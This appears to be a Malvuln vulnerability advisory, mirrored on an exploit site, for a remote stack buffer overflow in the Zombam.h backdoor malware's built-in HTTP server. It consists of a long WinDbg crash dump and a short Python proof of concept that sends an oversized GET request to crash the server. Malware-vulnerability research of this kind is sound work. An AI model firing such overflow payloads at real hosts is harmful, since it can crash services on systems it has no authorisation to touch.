Exploit for Backdoor.Win32.Zombam.h Buffer Overflow

Name: Exploit for Backdoor.Win32.Zombam.h Buffer Overflow
Rating: 5 (668 reviews)
2021-04-15 | CVSS 0.7
## https://sploitus.com/exploit?id=PACKETSTORM:162206
Discovery / credits: Malvuln - malvuln.com (c) 2021  
Original source: https://malvuln.com/advisory/55feab480a43727c8a08feb7344afb4a.txt  
Contact: malvuln13@gmail.com  
Media: twitter.com/malvuln  
  
Threat: Backdoor.Win32.Zombam.h  
Vulnerability: Remote Stack Buffer Overflow   
Description: Zombam.h HTTP RAT v01.b by z0mbie, creates a backdoor file named "httpserver.exe" that listens on TCP port 80. Attackers who can reach the backdoor can send HTTP GET request of about 6000 bytes to trigger buffer overflow corrupting the stack and overwriting EDX register.  
Type: PE32  
MD5: 55feab480a43727c8a08feb7344afb4a  
Vuln ID: MVID-2021-0171  
Dropped files: httpserver.exe  
ASLR: False  
DEP: False  
Safe SEH: True  
Disclosure: 04/14/2021  
  
Memory Dump:  
(e54.874): Access violation - code c0000005 (first/second chance not available)  
eax=00000000 ebx=00000000 ecx=048ffa24 edx=41414141 esi=00000003 edi=00000003  
eip=773ced3c esp=048ff0bc ebp=048ff24c iopl=0 nv up ei pl nz na po nc  
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202  
ntdll!ZwWaitForMultipleObjects+0xc:  
773ced3c c21400 ret 14h  
  
0:004> .ecxr  
eax=048ff9f4 ebx=040502b0 ecx=048ffa24 edx=41414141 esi=040502b0 edi=00404626  
eip=004024f8 esp=048ff9dc ebp=048ffa2c iopl=0 nv up ei pl zr na pe nc  
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246  
*** WARNING: Unable to verify checksum for httpserver.exe  
*** ERROR: Module load completed but symbols could not be loaded for httpserver.exe  
httpserver+0x24f8:  
004024f8 8b4204 mov eax,dword ptr [edx+4] ds:002b:41414145=????????  
  
0:004> !analyze -v  
*******************************************************************************  
* *  
* Exception Analysis *  
* *  
*******************************************************************************  
  
Failed calling InternetOpenUrl, GLE=12029  
  
FAULTING_IP:   
httpserver+24f8  
004024f8 8b4204 mov eax,dword ptr [edx+4]  
  
EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)  
ExceptionAddress: 004024f8 (httpserver+0x000024f8)  
ExceptionCode: c0000005 (Access violation)  
ExceptionFlags: 00000000  
NumberParameters: 2  
Parameter[0]: 00000000  
Parameter[1]: 41414145  
Attempt to read from address 41414145  
  
PROCESS_NAME: httpserver.exe  
  
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.  
  
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.  
  
EXCEPTION_PARAMETER1: 00000000  
  
EXCEPTION_PARAMETER2: 41414145  
  
READ_ADDRESS: 41414145   
  
FOLLOWUP_IP:   
httpserver+24f8  
004024f8 8b4204 mov eax,dword ptr [edx+4]  
  
MOD_LIST: <ANALYSIS/>  
  
NTGLOBALFLAG: 0  
  
APPLICATION_VERIFIER_FLAGS: 0  
  
FAULTING_THREAD: 00000874  
  
BUGCHECK_STR: APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_READ_FILL_PATTERN_41414141  
  
PRIMARY_PROBLEM_CLASS: STRING_DEREFERENCE_FILL_PATTERN_41414141  
  
DEFAULT_BUCKET_ID: STRING_DEREFERENCE_FILL_PATTERN_41414141  
  
LAST_CONTROL_TRANSFER: from 004020ac to 004024f8  
  
STACK_TEXT:   
WARNING: Stack unwind information not available. Following frames may be wrong.  
048ffa2c 004020ac 41414141 048ffa40 00000415 httpserver+0x24f8  
048ffaa4 41414141 41414141 41414141 41414141 httpserver+0x20ac  
048ffaa8 41414141 41414141 41414141 41414141 0x41414141  
048ffaac 41414141 41414141 41414141 41414141 0x41414141  
048ffab0 41414141 41414141 41414141 41414141 0x41414141  
048ffab4 41414141 41414141 41414141 41414141 0x41414141  
048ffab8 41414141 41414141 41414141 41414141 0x41414141  
048ffabc 41414141 41414141 41414141 41414141 0x41414141  
048ffac0 41414141 41414141 41414141 41414141 0x41414141  
048ffac4 41414141 41414141 41414141 41414141 0x41414141  
048ffac8 41414141 41414141 41414141 41414141 0x41414141  
048ffacc 41414141 41414141 41414141 41414141 0x41414141  
048ffad0 41414141 41414141 41414141 41414141 0x41414141  
048ffad4 41414141 41414141 41414141 41414141 0x41414141  
048ffad8 41414141 41414141 41414141 41414141 0x41414141  
048ffadc 41414141 41414141 41414141 41414141 0x41414141  
048ffae0 41414141 41414141 41414141 41414141 0x41414141  
048ffae4 41414141 41414141 41414141 41414141 0x41414141  
048ffae8 41414141 41414141 41414141 41414141 0x41414141  
048ffaec 41414141 41414141 41414141 41414141 0x41414141  
048ffaf0 41414141 41414141 41414141 41414141 0x41414141  
048ffaf4 41414141 41414141 41414141 41414141 0x41414141  
048ffaf8 41414141 41414141 41414141 41414141 0x41414141  
048ffafc 41414141 41414141 41414141 41414141 0x41414141  
048ffb00 41414141 41414141 41414141 41414141 0x41414141  
048ffb04 41414141 41414141 41414141 41414141 0x41414141  
048ffb08 41414141 41414141 41414141 41414141 0x41414141  
048ffb0c 41414141 41414141 41414141 41414141 0x41414141  
048ffb10 41414141 41414141 41414141 41414141 0x41414141  
048ffb14 41414141 41414141 41414141 41414141 0x41414141  
048ffb18 41414141 41414141 41414141 41414141 0x41414141  
048ffb1c 41414141 41414141 41414141 41414141 0x41414141  
048ffb20 41414141 41414141 41414141 41414141 0x41414141  
048ffb24 41414141 41414141 41414141 41414141 0x41414141  
048ffb28 41414141 41414141 41414141 41414141 0x41414141  
048ffb2c 41414141 41414141 41414141 41414141 0x41414141  
048ffb30 41414141 41414141 41414141 41414141 0x41414141  
048ffb34 41414141 41414141 41414141 41414141 0x41414141  
048ffb38 41414141 41414141 41414141 41414141 0x41414141  
048ffb3c 41414141 41414141 41414141 41414141 0x41414141  
048ffb40 41414141 41414141 41414141 41414141 0x41414141  
048ffb44 41414141 41414141 41414141 41414141 0x41414141  
048ffb48 41414141 41414141 41414141 41414141 0x41414141  
048ffb4c 41414141 41414141 41414141 41414141 0x41414141  
048ffb50 41414141 41414141 41414141 41414141 0x41414141  
048ffb54 41414141 41414141 41414141 41414141 0x41414141  
048ffb58 41414141 41414141 41414141 41414141 0x41414141  
048ffb5c 41414141 41414141 41414141 41414141 0x41414141  
048ffb60 41414141 41414141 41414141 41414141 0x41414141  
048ffb64 41414141 41414141 41414141 41414141 0x41414141  
048ffb68 41414141 41414141 41414141 41414141 0x41414141  
048ffb6c 41414141 41414141 41414141 41414141 0x41414141  
048ffb70 41414141 41414141 41414141 41414141 0x41414141  
048ffb74 41414141 41414141 41414141 41414141 0x41414141  
048ffb78 41414141 41414141 41414141 41414141 0x41414141  
048ffb7c 41414141 41414141 41414141 41414141 0x41414141  
048ffb80 41414141 41414141 41414141 41414141 0x41414141  
048ffb84 41414141 41414141 41414141 41414141 0x41414141  
048ffb88 41414141 41414141 41414141 41414141 0x41414141  
048ffb8c 41414141 41414141 41414141 41414141 0x41414141  
048ffb90 41414141 41414141 41414141 41414141 0x41414141  
048ffb94 41414141 41414141 41414141 41414141 0x41414141  
048ffb98 41414141 41414141 41414141 41414141 0x41414141  
048ffb9c 41414141 41414141 41414141 41414141 0x41414141  
048ffba0 41414141 41414141 41414141 41414141 0x41414141  
048ffba4 41414141 41414141 41414141 41414141 0x41414141  
048ffba8 41414141 41414141 41414141 41414141 0x41414141  
048ffbac 41414141 41414141 41414141 41414141 0x41414141  
048ffbb0 41414141 41414141 41414141 41414141 0x41414141  
048ffbb4 41414141 41414141 41414141 41414141 0x41414141  
048ffbb8 41414141 41414141 41414141 41414141 0x41414141  
048ffbbc 41414141 41414141 41414141 41414141 0x41414141  
048ffbc0 41414141 41414141 41414141 41414141 0x41414141  
048ffbc4 41414141 41414141 41414141 41414141 0x41414141  
048ffbc8 41414141 41414141 41414141 41414141 0x41414141  
048ffbcc 41414141 41414141 41414141 41414141 0x41414141  
048ffbd0 41414141 41414141 41414141 41414141 0x41414141  
048ffbd4 41414141 41414141 41414141 41414141 0x41414141  
048ffbd8 41414141 41414141 41414141 41414141 0x41414141  
048ffbdc 41414141 41414141 41414141 41414141 0x41414141  
048ffbe0 41414141 41414141 41414141 41414141 0x41414141  
048ffbe4 41414141 41414141 41414141 41414141 0x41414141  
048ffbe8 41414141 41414141 41414141 41414141 0x41414141  
048ffbec 41414141 41414141 41414141 41414141 0x41414141  
048ffbf0 41414141 41414141 41414141 41414141 0x41414141  
048ffbf4 41414141 41414141 41414141 41414141 0x41414141  
048ffbf8 41414141 41414141 41414141 41414141 0x41414141  
048ffbfc 41414141 41414141 41414141 41414141 0x41414141  
048ffc00 41414141 41414141 41414141 41414141 0x41414141  
048ffc04 41414141 41414141 41414141 41414141 0x41414141  
048ffc08 41414141 41414141 41414141 41414141 0x41414141  
048ffc0c 41414141 41414141 41414141 41414141 0x41414141  
048ffc10 41414141 41414141 41414141 41414141 0x41414141  
048ffc14 41414141 41414141 41414141 41414141 0x41414141  
048ffc18 41414141 41414141 41414141 41414141 0x41414141  
048ffc1c 41414141 41414141 41414141 41414141 0x41414141  
048ffc20 41414141 41414141 41414141 41414141 0x41414141  
048ffc24 41414141 41414141 41414141 41414141 0x41414141  
048ffc28 41414141 41414141 41414141 41414141 0x41414141  
048ffc2c 41414141 41414141 41414141 41414141 0x41414141  
048ffc30 41414141 41414141 41414141 41414141 0x41414141  
048ffc34 41414141 41414141 41414141 41414141 0x41414141  
048ffc38 41414141 41414141 41414141 41414141 0x41414141  
048ffc3c 41414141 41414141 41414141 41414141 0x41414141  
048ffc40 41414141 41414141 41414141 41414141 0x41414141  
048ffc44 41414141 41414141 41414141 41414141 0x41414141  
048ffc48 41414141 41414141 41414141 41414141 0x41414141  
048ffc4c 41414141 41414141 41414141 41414141 0x41414141  
048ffc50 41414141 41414141 41414141 41414141 0x41414141  
048ffc54 41414141 41414141 41414141 41414141 0x41414141  
048ffc58 41414141 41414141 41414141 41414141 0x41414141  
048ffc5c 41414141 41414141 41414141 41414141 0x41414141  
048ffc60 41414141 41414141 41414141 41414141 0x41414141  
048ffc64 41414141 41414141 41414141 41414141 0x41414141  
048ffc68 41414141 41414141 41414141 41414141 0x41414141  
048ffc6c 41414141 41414141 41414141 41414141 0x41414141  
048ffc70 41414141 41414141 41414141 41414141 0x41414141  
048ffc74 41414141 41414141 41414141 41414141 0x41414141  
048ffc78 41414141 41414141 41414141 41414141 0x41414141  
048ffc7c 41414141 41414141 41414141 41414141 0x41414141  
048ffc80 41414141 41414141 41414141 41414141 0x41414141  
048ffc84 41414141 41414141 41414141 41414141 0x41414141  
048ffc88 41414141 41414141 41414141 41414141 0x41414141  
048ffc8c 41414141 41414141 41414141 41414141 0x41414141  
048ffc90 41414141 41414141 41414141 41414141 0x41414141  
048ffc94 41414141 41414141 41414141 41414141 0x41414141  
048ffc98 41414141 41414141 41414141 41414141 0x41414141  
048ffc9c 41414141 41414141 41414141 41414141 0x41414141  
048ffca0 41414141 41414141 41414141 41414141 0x41414141  
048ffca4 41414141 41414141 41414141 41414141 0x41414141  
048ffca8 41414141 41414141 41414141 41414141 0x41414141  
048ffcac 41414141 41414141 41414141 41414141 0x41414141  
048ffcb0 41414141 41414141 41414141 41414141 0x41414141  
048ffcb4 41414141 41414141 41414141 41414141 0x41414141  
048ffcb8 41414141 41414141 41414141 41414141 0x41414141  
048ffcbc 41414141 41414141 41414141 41414141 0x41414141  
048ffcc0 41414141 41414141 41414141 41414141 0x41414141  
048ffcc4 41414141 41414141 41414141 41414141 0x41414141  
048ffcc8 41414141 41414141 41414141 41414141 0x41414141  
048ffccc 41414141 41414141 41414141 41414141 0x41414141  
048ffcd0 41414141 41414141 41414141 41414141 0x41414141  
048ffcd4 41414141 41414141 41414141 41414141 0x41414141  
048ffcd8 41414141 41414141 41414141 41414141 0x41414141  
048ffcdc 41414141 41414141 41414141 41414141 0x41414141  
048ffce0 41414141 41414141 41414141 41414141 0x41414141  
048ffce4 41414141 41414141 41414141 41414141 0x41414141  
048ffce8 41414141 41414141 41414141 41414141 0x41414141  
048ffcec 41414141 41414141 41414141 41414141 0x41414141  
048ffcf0 41414141 41414141 41414141 41414141 0x41414141  
048ffcf4 41414141 41414141 41414141 41414141 0x41414141  
048ffcf8 41414141 41414141 41414141 41414141 0x41414141  
048ffcfc 41414141 41414141 41414141 41414141 0x41414141  
048ffd00 41414141 41414141 41414141 41414141 0x41414141  
048ffd04 41414141 41414141 41414141 41414141 0x41414141  
048ffd08 41414141 41414141 41414141 41414141 0x41414141  
048ffd0c 41414141 41414141 41414141 41414141 0x41414141  
048ffd10 41414141 41414141 41414141 41414141 0x41414141  
048ffd14 41414141 41414141 41414141 41414141 0x41414141  
048ffd18 41414141 41414141 41414141 41414141 0x41414141  
048ffd1c 41414141 41414141 41414141 41414141 0x41414141  
048ffd20 41414141 41414141 41414141 41414141 0x41414141  
048ffd24 41414141 41414141 41414141 41414141 0x41414141  
048ffd28 41414141 41414141 41414141 41414141 0x41414141  
048ffd2c 41414141 41414141 41414141 41414141 0x41414141  
048ffd30 41414141 41414141 41414141 41414141 0x41414141  
048ffd34 41414141 41414141 41414141 41414141 0x41414141  
048ffd38 41414141 41414141 41414141 41414141 0x41414141  
048ffd3c 41414141 41414141 41414141 41414141 0x41414141  
048ffd40 41414141 41414141 41414141 41414141 0x41414141  
048ffd44 41414141 41414141 41414141 41414141 0x41414141  
048ffd48 41414141 41414141 41414141 41414141 0x41414141  
048ffd4c 41414141 41414141 41414141 41414141 0x41414141  
048ffd50 41414141 41414141 41414141 41414141 0x41414141  
048ffd54 41414141 41414141 41414141 41414141 0x41414141  
048ffd58 41414141 41414141 41414141 41414141 0x41414141  
048ffd5c 41414141 41414141 41414141 41414141 0x41414141  
048ffd60 41414141 41414141 41414141 41414141 0x41414141  
048ffd64 41414141 41414141 41414141 41414141 0x41414141  
048ffd68 41414141 41414141 41414141 41414141 0x41414141  
048ffd6c 41414141 41414141 41414141 41414141 0x41414141  
048ffd70 41414141 41414141 41414141 41414141 0x41414141  
048ffd74 41414141 41414141 41414141 41414141 0x41414141  
048ffd78 41414141 41414141 41414141 41414141 0x41414141  
048ffd7c 41414141 41414141 41414141 41414141 0x41414141  
048ffd80 41414141 41414141 41414141 41414141 0x41414141  
048ffd84 41414141 41414141 41414141 41414141 0x41414141  
048ffd88 41414141 41414141 41414141 41414141 0x41414141  
048ffd8c 41414141 41414141 41414141 41414141 0x41414141  
048ffd90 41414141 41414141 41414141 41414141 0x41414141  
048ffd94 41414141 41414141 41414141 41414141 0x41414141  
048ffd98 41414141 41414141 41414141 41414141 0x41414141  
048ffd9c 41414141 41414141 41414141 41414141 0x41414141  
048ffda0 41414141 41414141 41414141 41414141 0x41414141  
048ffda4 41414141 41414141 41414141 41414141 0x41414141  
048ffda8 41414141 41414141 41414141 41414141 0x41414141  
048ffdac 41414141 41414141 41414141 41414141 0x41414141  
048ffdb0 41414141 41414141 41414141 41414141 0x41414141  
048ffdb4 41414141 41414141 41414141 41414141 0x41414141  
048ffdb8 41414141 41414141 41414141 41414141 0x41414141  
048ffdbc 41414141 41414141 41414141 41414141 0x41414141  
048ffdc0 41414141 41414141 41414141 41414141 0x41414141  
048ffdc4 41414141 41414141 41414141 41414141 0x41414141  
048ffdc8 41414141 41414141 41414141 41414141 0x41414141  
048ffdcc 41414141 41414141 41414141 41414141 0x41414141  
048ffdd0 41414141 41414141 41414141 41414141 0x41414141  
048ffdd4 41414141 41414141 41414141 41414141 0x41414141  
048ffdd8 41414141 41414141 41414141 41414141 0x41414141  
048ffddc 41414141 41414141 41414141 41414141 0x41414141  
048ffde0 41414141 41414141 41414141 41414141 0x41414141  
048ffde4 41414141 41414141 41414141 41414141 0x41414141  
048ffde8 41414141 41414141 41414141 41414141 0x41414141  
048ffdec 41414141 41414141 41414141 41414141 0x41414141  
048ffdf0 41414141 41414141 41414141 41414141 0x41414141  
048ffdf4 41414141 41414141 41414141 41414141 0x41414141  
048ffdf8 41414141 41414141 41414141 41414141 0x41414141  
048ffdfc 41414141 41414141 41414141 41414141 0x41414141  
048ffe00 41414141 41414141 41414141 41414141 0x41414141  
048ffe04 41414141 41414141 41414  
  
STACK_COMMAND: ~4s; .ecxr ; kb  
  
SYMBOL_STACK_INDEX: 0  
  
SYMBOL_NAME: httpserver+24f8  
  
FOLLOWUP_NAME: MachineOwner  
  
MODULE_NAME: httpserver  
  
IMAGE_NAME: httpserver.exe  
  
DEBUG_FLR_IMAGE_TIMESTAMP: 3eb4a8cc  
  
FAILURE_BUCKET_ID: STRING_DEREFERENCE_FILL_PATTERN_41414141_c0000005_httpserver.exe!Unknown  
  
BUCKET_ID: APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_READ_FILL_PATTERN_41414141_httpserver+24f8  
  
  
Exploit/PoC:  
from socket import *  
  
MALWARE_HOST="x.x.x.x"  
PORT=80  
  
def doit():  
s=socket(AF_INET, SOCK_STREAM)  
s.connect((MALWARE_HOST, PORT))  
  
PBARBAR="GET /"+"A"*6000+"HTTP/1.1\r\nHost: "+MALWARE_HOST+"\r\n\r\n"  
  
s.send(PBARBAR)  
s.close()  
  
print("Backdoor.Win32.Zombam.h / Remote Stack Buffer Overflow")  
print("MD5: 55feab480a43727c8a08feb7344afb4a")  
print("By Malvuln");  
  
if __name__=="__main__":  
doit()  
  
  
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).